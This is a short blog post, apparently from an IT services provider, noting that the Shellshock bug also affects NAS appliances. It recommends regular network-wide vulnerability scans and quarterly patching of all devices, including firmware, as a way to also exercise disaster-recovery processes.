This article in Ars Technica points out a fairly common issue that sometimes surprises even our more security-conscious customers. We are reminded that the famous Shellshock bug also affects what many consider appliances, in this case a NAS unit. In other words, IT departments may have patched all servers affected by Shellshock and forgot about the NAS devices (or did not know about it.
What can you do to reduce this risk? First, regular vulnerability scans of your entire network would have flagged the devices in question. In other words, even if you patch all the servers on your list, your list may not be complete and up to date. Second, a regular comprehensive patching process would help keep all devices up to date on patches, service packs and firmware updates. Yes, firmware updates usually mean reboots. Sure, they are potentially dangerous and typically bring comparatively little benefit. But going through the process of patching everything from the metal up every quarter not only helps keep your environment’s layered defenses up to date, it also forces you to dust off your DR process (you do have one of those, right?)
Because this process means reboots (and lots of them,) it usually means that your patch/DR team will perform these after hours. And because this process could generate some resume-refreshing events, people take it seriously. This means that your DR/patch team will be focused, motivated and undisturbed. Your team will also know their environment front and back. All of this will really pay off if you ever find yourself in a real DR situation.